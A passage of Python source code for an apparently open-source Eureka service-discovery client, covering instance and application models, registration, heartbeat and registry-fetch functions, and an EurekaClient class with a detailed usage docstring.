durationInSecs: int = _DURATION_IN_SECS,
registrationTimestamp: int = 0,
lastRenewalTimestamp: int = 0,
renewalTimestamp: int = 0,
evictionTimestamp: int = 0,
serviceUpTimestamp: int = 0):
self.renewalIntervalInSecs: int = renewalIntervalInSecs
self.durationInSecs: int = durationInSecs
self.registrationTimestamp: int = registrationTimestamp
self.lastRenewalTimestamp: int = lastRenewalTimestamp
self.renewalTimestamp: int = renewalTimestamp
self.evictionTimestamp: int = evictionTimestamp
self.serviceUpTimestamp: int = serviceUpTimestamp
class DataCenterInfo:
def __init__(self,
name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
className=_DEFAULT_DATA_CENTER_INFO_CLASS,
metadata={}):
self.name: str = name
self.className: str = className
self.metadata: Dict = metadata if metadata else {}
class PortWrapper:
def __init__(self, port=0, enabled=False):
self.port: int = port
self.enabled: bool = enabled
class Instance:
def __init__(self,
instanceId="",
sid="", # @deprecated
app="",
appGroupName="",
ipAddr="",
port=PortWrapper(port=_DEFAULT_INSTNACE_PORT, enabled=True),
securePort=PortWrapper(port=_DEFAULT_INSTNACE_SECURE_PORT, enabled=False),
homePageUrl="",
statusPageUrl="",
healthCheckUrl="",
secureHealthCheckUrl="",
vipAddress="",
secureVipAddress="",
countryId=1,
dataCenterInfo=DataCenterInfo(),
hostName="",
status="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
overriddenstatus="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
leaseInfo=LeaseInfo(),
isCoordinatingDiscoveryServer=False,
metadata=None,
lastUpdatedTimestamp=0,
lastDirtyTimestamp=0,
actionType=ACTION_TYPE_ADDED, # ADDED, MODIFIED, DELETED
asgName=""):
self.__instanceId: str = instanceId
self.sid: str = sid
self.app: str = app
self.appGroupName: str = appGroupName
self.ipAddr: str = ipAddr
self.port: PortWrapper = port
self.securePort: PortWrapper = securePort
self.homePageUrl: str = homePageUrl
self.statusPageUrl: str = statusPageUrl
self.healthCheckUrl: str = healthCheckUrl
self.secureHealthCheckUrl: str = secureHealthCheckUrl
self.vipAddress: str = vipAddress
self.secureVipAddress: str = secureVipAddress
self.countryId: str = countryId
self.dataCenterInfo: DataCenterInfo = dataCenterInfo
self.hostName: str = hostName
self.status: str = status
self.overriddenstatus: str = overriddenstatus
self.leaseInfo: LeaseInfo = leaseInfo
self.isCoordinatingDiscoveryServer: bool = isCoordinatingDiscoveryServer
self.metadata: Dict = metadata if metadata is not None else {}
self.lastUpdatedTimestamp: int = lastUpdatedTimestamp
self.lastDirtyTimestamp: int = lastDirtyTimestamp
self.actionType: int = actionType
self.asgName: int = asgName
@property
def instanceId(self):
return self.__instanceId if self.__instanceId else f"{self.hostName}:{self.ipAddr}:{self.app}:{self.port.port if self.port else 0}"
@instanceId.setter
def instanceId(self, id):
self.__instanceId = id
@property
def zone(self) -> str:
if self.dataCenterInfo and self.dataCenterInfo.name == "Amazon" \
and self.dataCenterInfo.metadata and "availability-zone" in self.dataCenterInfo.metadata:
return self.dataCenterInfo.metadata["availability-zone"]
if self.metadata and "zone" in self.metadata and self.metadata["zone"]:
return self.metadata["zone"]
else:
return _DEFAUTL_ZONE
class Application:
def __init__(self,
name="",
instances=None):
self.name: str = name
if isinstance(instances, list):
for ins in instances:
self.add_instance(ins)
self.__instances_dict = {}
self.__inst_lock = RLock()
@property
def instances(self) -> List[Instance]:
with self.__inst_lock:
return list(self.__instances_dict.values())
@property
def up_instances(self) -> List[Instance]:
with self.__inst_lock:
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP]
def get_instance(self, instance_id: str) -> Instance:
with self.__inst_lock:
if instance_id in self.__instances_dict:
return self.__instances_dict[instance_id]
else:
return None
def add_instance(self, instance: Instance) -> None:
with self.__inst_lock:
self.__instances_dict[instance.instanceId] = instance
def update_instance(self, instance: Instance) -> None:
with self.__inst_lock:
_logger.debug(f"update instance {instance.instanceId}")
self.__instances_dict[instance.instanceId] = instance
def remove_instance(self, instance: Instance) -> None:
with self.__inst_lock:
if instance.instanceId in self.__instances_dict:
del self.__instances_dict[instance.instanceId]
def up_instances_in_zone(self, zone: str) -> List[Instance]:
with self.__inst_lock:
_zone = zone if zone else _DEFAUTL_ZONE
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP and item.zone == _zone]
def up_instances_not_in_zone(self, zone: str) -> List[Instance]:
with self.__inst_lock:
_zone = zone if zone else _DEFAUTL_ZONE
return [item for item in self.__instances_dict.values() if item.status == INSTANCE_STATUS_UP and item.zone != _zone]
class Applications:
def __init__(self,
apps__hashcode="",
versions__delta="",
applications=None):
self.apps__hashcode: str = apps__hashcode
self.versions__delta: str = versions__delta
self.__applications = applications if applications is not None else []
self.__application_name_dic = {}
self.__app_lock = RLock()
@property
def appsHashcode(self) -> str:
return self.apps__hashcode
@property
def applications(self) -> List[Application]:
return self.__applications
@property
def versionsDelta(self) -> str:
return self.versions__delta
def add_application(self, application: Application) -> None:
with self.__app_lock:
self.__applications.append(application)
self.__application_name_dic[application.name] = application
def get_application(self, app_name: str = "") -> Application:
with self.__app_lock:
aname = app_name.upper()
if app_name in self.__application_name_dic:
return self.__application_name_dic[aname]
else:
return Application(name=aname)
########################## Basic functions #################################
####### Registry functions #########
def register(eureka_server: str, instance: Instance) -> None:
instance_dic = {
'instanceId': instance.instanceId,
'hostName': instance.hostName,
'app': instance.app,
'ipAddr': instance.ipAddr,
'status': instance.status,
'overriddenstatus': instance.overriddenstatus,
'port': {
'$': instance.port.port,
'@enabled': str(instance.port.enabled).lower()
},
'securePort': {
'$': instance.securePort.port,
'@enabled': str(instance.securePort.enabled).lower()
},
'countryId': instance.countryId,
'dataCenterInfo': {
'@class': instance.dataCenterInfo.className,
'name': instance.dataCenterInfo.name
},
'leaseInfo': {
'renewalIntervalInSecs': instance.leaseInfo.renewalIntervalInSecs,
'durationInSecs': instance.leaseInfo.durationInSecs,
'registrationTimestamp': instance.leaseInfo.registrationTimestamp,
'lastRenewalTimestamp': instance.leaseInfo.lastRenewalTimestamp,
'evictionTimestamp': instance.leaseInfo.evictionTimestamp,
'serviceUpTimestamp': instance.leaseInfo.serviceUpTimestamp
},
'metadata': instance.metadata,
'homePageUrl': instance.homePageUrl,
'statusPageUrl': instance.statusPageUrl,
'healthCheckUrl': instance.healthCheckUrl,
'secureHealthCheckUrl': instance.secureHealthCheckUrl,
'vipAddress': instance.vipAddress,
'secureVipAddress': instance.secureVipAddress,
'lastUpdatedTimestamp': str(instance.lastUpdatedTimestamp),
'lastDirtyTimestamp': str(instance.lastDirtyTimestamp),
'isCoordinatingDiscoveryServer': str(instance.isCoordinatingDiscoveryServer).lower()
}
if instance.dataCenterInfo.metadata:
instance_dic["dataCenterInfo"]["metadata"] = instance.dataCenterInfo.metadata
_register(eureka_server, instance_dic)
def _register(eureka_server: str, instance_dic: Dict) -> None:
req = http_client.Request(f"{_format_url(eureka_server)}apps/{quote(instance_dic['app'])}", method="POST")
req.add_header('Content-Type', 'application/json')
http_client.load(req, json.dumps({"instance": instance_dic}).encode(_DEFAULT_ENCODING), timeout=_DEFAULT_TIME_OUT)[0]
def cancel(eureka_server: str, app_name: str, instance_id: str) -> None:
req = http_client.Request(f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}", method="DELETE")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def send_heartbeat(eureka_server: str,
app_name: str,
instance_id: str,
last_dirty_timestamp: int,
status: str = INSTANCE_STATUS_UP,
overriddenstatus: str = "") -> None:
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}?status={status}&lastDirtyTimestamp={last_dirty_timestamp}"
if overriddenstatus != "":
url += f"&overriddenstatus={overriddenstatus}"
req = http_client.Request(url, method="PUT")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def status_update(eureka_server: str,
app_name: str,
instance_id: str,
last_dirty_timestamp,
status: str = INSTANCE_STATUS_OUT_OF_SERVICE,
overriddenstatus: str = ""):
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}/status?value={status}&lastDirtyTimestamp={last_dirty_timestamp}"
if overriddenstatus != "":
url += f"&overriddenstatus={overriddenstatus}"
req = http_client.Request(url, method="PUT")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
def delete_status_override(eureka_server: str, app_name: str, instance_id: str, last_dirty_timestamp: str):
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}/status?lastDirtyTimestamp={last_dirty_timestamp}"
req = http_client.Request(url, method="DELETE")
http_client.load(req, timeout=_DEFAULT_TIME_OUT)[0]
####### Discovory functions ########
def get_applications(eureka_server: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}apps/", regions)
def _format_url(url):
if url.endswith('/'):
return url
else:
return url + "/"
def _get_applications_(url, regions=[]):
_url = url
if len(regions) > 0:
_url = _url + ("&" if "?" in _url else "?") + "regions=" + (",".join(regions))
txt = http_client.load(_url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_applications(ElementTree.fromstring(txt.encode(_DEFAULT_ENCODING)))
def _build_applications(xml_node):
if xml_node.tag != "applications":
return None
applications = Applications()
for child_node in list(xml_node):
if child_node.tag == "versions__delta" and child_node.text is not None:
applications.versions__delta = child_node.text
elif child_node.tag == "apps__hashcode" and child_node.text is not None:
applications.apps__hashcode = child_node.text
elif child_node.tag == "application":
applications.add_application(_build_application(child_node))
return applications
def _build_application(xml_node):
if xml_node.tag != "application":
return None
application = Application()
for child_node in xml_node:
if child_node.tag == "name":
application.name = child_node.text
elif child_node.tag == "instance":
application.add_instance(_build_instance(child_node))
return application
def _build_instance(xml_node):
if xml_node.tag != "instance":
return None
instance = Instance()
for child_node in xml_node:
if child_node.tag == "instanceId":
instance.instanceId = child_node.text
elif child_node.tag == "sid":
instance.sid = child_node.text
elif child_node.tag == "app":
instance.app = child_node.text
elif child_node.tag == "appGroupName":
instance.appGroupName = child_node.text
elif child_node.tag == "ipAddr":
instance.ipAddr = child_node.text
elif child_node.tag == "port":
instance.port = _build_port(child_node)
elif child_node.tag == "securePort":
instance.securePort = _build_port(child_node)
elif child_node.tag == "homePageUrl":
instance.homePageUrl = child_node.text
elif child_node.tag == "statusPageUrl":
instance.statusPageUrl = child_node.text
elif child_node.tag == "healthCheckUrl":
instance.healthCheckUrl = child_node.text
elif child_node.tag == "secureHealthCheckUrl":
instance.secureHealthCheckUrl = child_node.text
elif child_node.tag == "vipAddress":
instance.vipAddress = child_node.text
elif child_node.tag == "secureVipAddress":
instance.secureVipAddress = child_node.text
elif child_node.tag == "countryId":
instance.countryId = int(child_node.text)
elif child_node.tag == "dataCenterInfo":
instance.dataCenterInfo = _build_data_center_info(child_node)
elif child_node.tag == "hostName":
instance.hostName = child_node.text
elif child_node.tag == "status":
instance.status = child_node.text
elif child_node.tag == "overriddenstatus":
instance.overriddenstatus = child_node.text
elif child_node.tag == "leaseInfo":
instance.leaseInfo = _build_lease_info(child_node)
elif child_node.tag == "isCoordinatingDiscoveryServer":
instance.isCoordinatingDiscoveryServer = (child_node.text == "true")
elif child_node.tag == "metadata":
instance.metadata = _build_metadata(child_node)
elif child_node.tag == "lastUpdatedTimestamp":
instance.lastUpdatedTimestamp = int(child_node.text)
elif child_node.tag == "lastDirtyTimestamp":
instance.lastDirtyTimestamp = int(child_node.text)
elif child_node.tag == "actionType":
instance.actionType = child_node.text
elif child_node.tag == "asgName":
instance.asgName = child_node.text
return instance
def _build_data_center_info(xml_node):
class_name = xml_node.attrib["class"]
name = ""
metadata = {}
for child_node in xml_node:
if child_node.tag == "name":
name = child_node.text
elif child_node.tag == "metadata":
metadata = _build_metadata(child_node)
return DataCenterInfo(name=name, className=class_name, metadata=metadata)
def _build_metadata(xml_node):
metadata = {}
for child_node in list(xml_node):
metadata[child_node.tag] = child_node.text
return metadata
def _build_lease_info(xml_node):
leaseInfo = LeaseInfo()
for child_node in list(xml_node):
if child_node.tag == "renewalIntervalInSecs":
leaseInfo.renewalIntervalInSecs = int(child_node.text)
elif child_node.tag == "durationInSecs":
leaseInfo.durationInSecs = int(child_node.text)
elif child_node.tag == "registrationTimestamp":
leaseInfo.registrationTimestamp = int(child_node.text)
elif child_node.tag == "lastRenewalTimestamp":
leaseInfo.lastRenewalTimestamp = int(child_node.text)
elif child_node.tag == "renewalTimestamp":
leaseInfo.renewalTimestamp = int(child_node.text)
elif child_node.tag == "evictionTimestamp":
leaseInfo.evictionTimestamp = int(child_node.text)
elif child_node.tag == "serviceUpTimestamp":
leaseInfo.serviceUpTimestamp = int(child_node.text)
return leaseInfo
def _build_port(xml_node):
port = PortWrapper()
port.port = int(xml_node.text)
port.enabled = (xml_node.attrib["enabled"] == "true")
return port
def get_delta(eureka_server: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}apps/delta", regions)
def get_vip(eureka_server: str, vip: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}vips/{vip}", regions)
def get_secure_vip(eureka_server: str, svip: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}svips/{svip}", regions)
def get_application(eureka_server: str, app_name: str) -> Application:
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}"
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_application(ElementTree.fromstring(txt))
def get_app_instance(eureka_server: str, app_name: str, instance_id: str) -> Instance:
return _get_instance_(f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}")
def get_instance(eureka_server: str, instance_id: str) -> Instance:
return _get_instance_(f"{_format_url(eureka_server)}instances/{quote(instance_id)}")
def _get_instance_(url):
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_instance(ElementTree.fromstring(txt))
def _current_time_millis():
return int(time.time() * 1000)
"""====================== Client ======================================="""
class EurekaServerConf(object):
def __init__(self,
eureka_server=_DEFAULT_EUREKA_SERVER_URL,
eureka_domain="",
eureka_protocol="http",
eureka_basic_auth_user="",
eureka_basic_auth_password="",
eureka_context="eureka/v2",
eureka_availability_zones={},
region="",
zone=""):
self.__servers = {}
self.region: str = region
self.__zone = zone
self.__eureka_availability_zones = eureka_availability_zones
_zone = zone if zone else _DEFAUTL_ZONE
if eureka_domain:
zone_urls = get_txt_dns_record(f"txt.{region}.{eureka_domain}")
for zone_url in zone_urls:
zone_name = zone_url.split(".")[0]
eureka_urls = get_txt_dns_record(f"txt.{zone_url}")
self.__servers[zone_name] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_urls]
elif eureka_availability_zones:
for zone_name, v in eureka_availability_zones.items():
if isinstance(v, list):
eureka_urls = v
else:
eureka_urls = str(v).split(",")
self.__servers[zone_name] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_urls]
else:
self.__servers[_zone] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_server.split(",")]
self.__servers_not_in_zone = copy(self.__servers)
if _zone in self.__servers_not_in_zone:
del self.__servers_not_in_zone[_zone]
@property
def zone(self) -> str:
if self.__zone:
return self.__zone
elif self.__eureka_availability_zones:
return self.__eureka_availability_zones.keys()[0]
else:
return _DEFAUTL_ZONE
def _format_url(self, server_url="",
eureka_protocol="http",
eureka_basic_auth_user="",
eureka_basic_auth_password="",
eureka_context="eureka/v2"):
url = server_url
if url.endswith('/'):
url = url[0: -1]
if url.find("://") > 0:
prtl, url = tuple(url.split("://"))
else:
prtl = eureka_protocol
if url.find("@") > 0:
basic_auth, url = tuple(url.split("@"))
if basic_auth.find(":") > 0:
user, password = tuple(basic_auth.split(":"))
else:
user = basic_auth
password = ""
else:
user = quote(eureka_basic_auth_user)
password = quote(eureka_basic_auth_password)
basic_auth = ""
if user:
if password:
basic_auth = f"{user}:{password}"
else:
basic_auth = user
basic_auth += "@"
if url.find("/") > 0:
ctx = ""
else:
ctx = eureka_context if eureka_context.startswith('/') else "/" + eureka_context
return f"{prtl}://{basic_auth}{url}{ctx}"
@property
def servers(self) -> Dict:
return self.__servers
@property
def servers_in_zone(self) -> List[str]:
if self.zone in self.servers:
return self.servers[self.zone]
else:
return []
@property
def servers_not_in_zone(self) -> List[str]:
return self.__servers_not_in_zone
class EurekaServerConnectionException(http_client.URLError):
pass
class DiscoverException(http_client.URLError):
pass
class EurekaClient:
"""
Example:
>>> client = EurekaClient(
eureka_server="http://my_eureka_server_peer_1/eureka/v2,http://my_eureka_server_peer_2/eureka/v2",
app_name="python_module_1",
instance_port=9090)
>>> client.start()
>>> result = client.do_service("APP_NAME", "/context/path", return_type="json")
EIPs support:
You can configure EIP using `eureka_availability_zones` and specify the `zone` of your instance. But please aware, that the client won't fill up the metadata atomatically,
You should put it to the `metadata` when creating the object.
>>> client = EurekaClient(eureka_availability_zones={
"us-east-1c": "http://ec2-552-627-568-165.compute-1.amazonaws.com:7001/eureka/v2/,http://ec2-368-101-182-134.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1d": "http://ec2-552-627-568-170.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1e": "http://ec2-500-179-285-592.compute-1.amazonaws.com:7001/eureka/v2/"},
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
EurekaClient supports DNS discovery feature.
For instance, following is a DNS TXT record created in the DNS server that lists the set of available DNS names for a zone.
>>> txt.us-east-1.mydomaintest.netflix.net="us-east-1c.mydomaintest.netflix.net" "us-east-1d.mydomaintest.netflix.net" "us-east-1e.mydomaintest.netflix.net"
Then, you can define TXT records recursively for each zone similar to the following (if more than one hostname per zone, space delimit)
>>> txt.us-east-1c.mydomaintest.netflix.net="ec2-552-627-568-165.compute-1.amazonaws.com" "ec2-368-101-182-134.compute-1.amazonaws.com"
>>> txt.us-east-1d.mydomaintest.netflix.net="ec2-552-627-568-170.compute-1.amazonaws.com"
>>> txt.us-east-1e.mydomaintest.netflix.net="ec2-500-179-285-592.compute-1.amazonaws.com"
And then you can create the client like:
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
Eureka client also supports setting up the protocol, basic authentication and context path of your eureka server.
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
or
>>> client = EurekaClient(eureka_server="my_eureka_server_peer_1,my_eureka_server_peer_2",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090)
You can use `do_service`, `do_service_async`, `wall_nodes`, `wall_nodes_async` to call the remote services.
>>> res = eureka_client.do_service("OTHER-SERVICE-NAME", "/service/context/path")
>>> def success_callabck(data):
...
def error_callback(error):
...
client.do_service_async("OTHER-SERVICE-NAME", "/service/context/path", on_success=success_callabck, on_error=error_callback)
>>> def walk_using_your_own_urllib(url):
...
res = client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path", walker=walk_using_your_own_urllib)
>>> client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path",
walker=walk_using_your_own_urllib,
on_success=success_callabck,
on_error=error_callback)
Attributes:
* eureka_server: The eureka server url, if you want have deploy a cluster to do the failover, use `,` to separate the urls.
* eureka_domain: The domain name when using the DNS discovery.
* region: The region when using DNS discovery.
* zone: Which zone your instances belong to, default is `default`.
* eureka_availability_zones: The zones' url configurations.
* eureka_protocol: The protocol of the eureka server, if the url include this part, this protocol will not add to the url.
* eureka_basic_auth_user: User name of the basic authentication of the eureka server, if the url include this part, this protocol will not add to the url.
* eureka_basic_auth_password: Password of the basic authentication of the eureka server, if the url include this part, this protocol will not add to the url.
* eureka_context: The context path of the eureka server, if the url include this part, this protocol will not add to the url, default is `/eureka`
which meets the spring-boot eureka context but not the Netflix eureka server url.
* prefer_same_zone: When set to True, will first find the eureka server in the same zone to register, and find the instances in the same zone to do
the service. Or it will randomly choose the eureka server to register and instances to do the services, default is `True`.
* should_register: When set to False, will not register this instance to the eureka server, default is `True`.
* should_discover: When set to False, will not pull registry from the eureka server, default is `True`.
The following parameters all the properties of this instances, all this fields will be sent to the eureka server.
* app_name: The application name of this instance.
* instance_id: The id of this instance, if not specified, will generate one by app_name and instance_host/instance_ip and instance_port.
* instance_host: The host of this instance.
* instance_ip: The ip of this instance. If instance_host and instance_ip are not specified, will try to find the ip via connection to the eureka server.
* instance_ip_network: The ip network of this instance. If instance_host and instance_ip are not specified, will try to find the ip from the avaiable network adapters that matches the specified network. For example 192.168.1.0/24.
* instance_port: The port of this instance.
* instance_unsecure_port_enabled: Set whether enable the instance's unsecure port, default is `True`.
* instance_secure_port: The secure port of this instance.
* instance_secure_port_enabled: Set whether enable the instance's secure port, default is `False`.
* data_center_name: Accept `Netflix`, `Amazon`, `MyOwn`, default is `MyOwn`
* renewal_interval_in_secs: Will send heartbeat and pull registry in this time interval, defalut is 30 seconds
* duration_in_secs: Sets the client specified setting for eviction (e.g. how long to wait without renewal event).
* home_page_url: The home page url of this instance.
* status_page_url: The status page url of this instance.
* health_check_url: The health check url of this instance.
* secure_health_check_url: The secure health check url of this instance.
* vip_adr: The virtual ip address of this instance.
* secure_vip_addr: The secure virtual ip address of this instance.
* is_coordinating_discovery_server: Sets a flag if this instance is the same as the discovery server that is
return the instances. This flag is used by the discovery clients to
identity the discovery server which is coordinating/returning the
information.
* metadata: The metadata map of this instances.
* remote_regions: Will also find the services that belongs to these regions.
* ha_strategy: Specify the strategy how to choose a instance when there are more than one instanse of an App.
"""
def __init__(self,
eureka_server: str = _DEFAULT_EUREKA_SERVER_URL,
eureka_domain: str = "",
region: str = "",
zone: str = "",
eureka_availability_zones: Dict[str, str] = {},
eureka_protocol: str = "http",
eureka_basic_auth_user: str = "",
eureka_basic_auth_password: str = "",
eureka_context: str = "/eureka",
prefer_same_zone: bool = True,
should_register: bool = True,
should_discover: bool = True,
on_error: Callable = None,
app_name: str = "",
instance_id: str = "",
instance_host: str = "",
instance_ip: str = "",
instance_ip_network: str = "",
instance_port: int = _DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled: bool = True,
instance_secure_port: int = _DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled: bool = False,
data_center_name: str = _DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs: int = _RENEWAL_INTERVAL_IN_SECS,
duration_in_secs: int = _DURATION_IN_SECS,
home_page_url: str = "",
status_page_url: str = "",
health_check_url: str = "",
secure_health_check_url: str = "",
vip_adr: str = "",
secure_vip_addr: str = "",
is_coordinating_discovery_server: bool = False,
metadata: Dict = {},
remote_regions: List[str] = [],
ha_strategy: int = HA_STRATEGY_RANDOM):
assert app_name is not None and app_name != "" if should_register else True, "application name must be specified."
assert instance_port > 0 if should_register else True, "port is unvalid"
assert isinstance(metadata, dict), "metadata must be dict"
assert ha_strategy in (HA_STRATEGY_RANDOM, HA_STRATEGY_STICK,
HA_STRATEGY_OTHER) if should_discover else True, f"do not support strategy {ha_strategy}"
self.__net_lock = RLock()
self.__eureka_server_conf = EurekaServerConf(
eureka_server=eureka_server,
eureka_domain=eureka_domain,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
eureka_availability_zones=eureka_availability_zones,
region=region,
zone=zone
)
self.__cache_eureka_url = {}
self.__should_register = should_register
self.__should_discover = should_discover
self.__prefer_same_zone = prefer_same_zone
self.__alive = False
self.__heartbeat_interval = renewal_interval_in_secs
self.__heartbeat_timer = Timer(renewal_interval_in_secs, self.__heartbeat)
self.__heartbeat_timer.daemon = True
self.__instance_ip = instance_ip
self.__instance_ip_network = instance_ip_network
self.__instance_host = instance_host
self.__aws_metadata = {}
self.__on_error_callback = on_error
# For Registery
if should_register:
if data_center_name == "Amazon":
self.__aws_metadata = self.__load_ec2_metadata_dict()
if self.__instance_host == "" and self.__instance_ip == "":
self.__instance_ip, self.__instance_host = self.__get_ip_host(self.__instance_ip_network)
elif self.__instance_host != "" and self.__instance_ip == "":
self.__instance_ip = netint.get_ip_by_host(self.__instance_host)
if not EurekaClient.__is_ip(self.__instance_ip):
def try_to_get_client_ip(url):
self.__instance_ip = EurekaClient.__get_instance_ip(url)
self.__connect_to_eureka_server(try_to_get_client_ip)
elif self.__instance_host == "" and self.__instance_ip != "":
self.__instance_host = netint.get_host_by_ip(self.__instance_ip)
mdata = {
'management.port': str(instance_port)
}
if zone:
mdata["zone"] = zone
mdata.update(metadata)
ins_id = instance_id if instance_id != "" else f"{self.__instance_ip}:{app_name.lower()}:{instance_port}"
_logger.debug(f"register instance using id [#{ins_id}]")
self.__instance = {
'instanceId': ins_id,
'hostName': self.__instance_host,
'app': app_name.upper(),
'ipAddr': self.__instance_ip,
'port': {
'$': instance_port,
'@enabled': str(instance_unsecure_port_enabled).lower()
},
'securePort': {
'$': instance_secure_port,
'@enabled': str(instance_secure_port_enabled).lower()
},
'countryId': 1,
'dataCenterInfo': {
'@class': _AMAZON_DATA_CENTER_INFO_CLASS if data_center_name == "Amazon" else _DEFAULT_DATA_CENTER_INFO_CLASS,
'name': data_center_name
},
'leaseInfo': {
'renewalIntervalInSecs': renewal_interval_in_secs,
'durationInSecs': duration_in_secs,
'registrationTimestamp': 0,
'lastRenewalTimestamp': 0,
'evictionTimestamp': 0,
'serviceUpTimestamp': 0
},
'metadata': mdata,
'homePageUrl': EurekaClient.__format_url(home_page_url, self.__instance_host, instance_port),
'statusPageUrl': EurekaClient.__format_url(status_page_url, self.__instance_host, instance_port, "info"),
'healthCheckUrl': EurekaClient.__format_url(health_check_url, self.__instance_host, instance_port, "health"),
'secureHealthCheckUrl': secure_health_check_url,
'vipAddress': vip_adr if vip_adr != "" else app_name.lower(),
'secureVipAddress': secure_vip_addr if secure_vip_addr != "" else app_name.lower(),
'isCoordinatingDiscoveryServer': str(is_coordinating_discovery_server).lower()
}
if data_center_name == "Amazon":
self.__instance["dataCenterInfo"]["metadata"] = self.__aws_metadata
else:
self.__instance = {}
# For discovery
self.__remote_regions = remote_regions if remote_regions is not None else []
self.__applications = None
self.__delta = None
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__application_mth_lock = RLock()
def __get_ip_host(self, network):
ip, host = netint.get_ip_and_host(network)
if self.__aws_metadata and "local-ipv4" in self.__aws_metadata and self.__aws_metadata["local-ipv4"]:
ip = self.__aws_metadata["local-ipv4"]
if self.__aws_metadata and "local-hostname" in self.__aws_metadata and self.__aws_metadata["local-hostname"]:
host = self.__aws_metadata["local-hostname"]
return ip, host
def __load_ec2_metadata_dict(self):
# instance metadata
amazon_info = AmazonInfo()
mac = amazon_info.get_ec2_metadata('mac')
if mac:
vpc_id = amazon_info.get_ec2_metadata(f'network/interfaces/macs/{mac}/vpc-id')
else:
vpc_id = ""
metadata = {
'instance-id': amazon_info.get_ec2_metadata('instance-id'),
'ami-id': amazon_info.get_ec2_metadata('ami-id'),
'instance-type': amazon_info.get_ec2_metadata('instance-type'),
'local-ipv4': amazon_info.get_ec2_metadata('local-ipv4'),
'local-hostname': amazon_info.get_ec2_metadata('local-hostname'),
'availability-zone': amazon_info.get_ec2_metadata('placement/availability-zone', ignore_error=True),
'public-hostname': amazon_info.get_ec2_metadata('public-hostname', ignore_error=True),
'public-ipv4': amazon_info.get_ec2_metadata('public-ipv4', ignore_error=True),
'mac': mac,
'vpcId': vpc_id
}
# accountId
doc = amazon_info.get_instance_identity_document()
if doc and "accountId" in doc:
metadata["accountId"] = doc["accountId"]
return metadata
@property
def should_register(self) -> bool:
return self.__should_register
@property
def should_discover(self) -> bool:
return self.__should_discover
@property
def zone(self) -> str:
return self.__eureka_server_conf.zone
@property
def applications(self) -> Applications:
if not self.should_discover:
raise DiscoverException("should_discover set to False, no registry is pulled, cannot find any applications.")
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_eureka_server_in_cache(self, fun):
ok = False
invalid_keys = []
for z, url in self.__cache_eureka_url.items():
try:
_logger.debug(f"Try to do {fun.__name__} in zone[{z}] using cached url {url}. ")
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"Eureka server [{url}] is down, use next url to try.", exc_info=True)
invalid_keys.append(z)
else:
ok = True
if invalid_keys:
_logger.debug(f"Invalid keys::{invalid_keys} will be removed from cache.")
for z in invalid_keys:
del self.__cache_eureka_url[z]
if not ok:
raise EurekaServerConnectionException("All eureka servers in cache are down!")
def __try_eureka_server_in_zone(self, fun):
self.__try_eureka_servers_in_list(fun, self.__eureka_server_conf.servers_in_zone, self.zone)
def __try_eureka_server_not_in_zone(self, fun):
for zone, urls in self.__eureka_server_conf.servers_not_in_zone.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except EurekaServerConnectionException:
_logger.warn(f"try eureka servers in zone[{zone}] error!", exc_info=True)
else:
return
raise EurekaServerConnectionException("All eureka servers in all zone are down!")
def __try_eureka_server_regardless_zones(self, fun):
for zone, urls in self.__eureka_server_conf.servers.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except EurekaServerConnectionException:
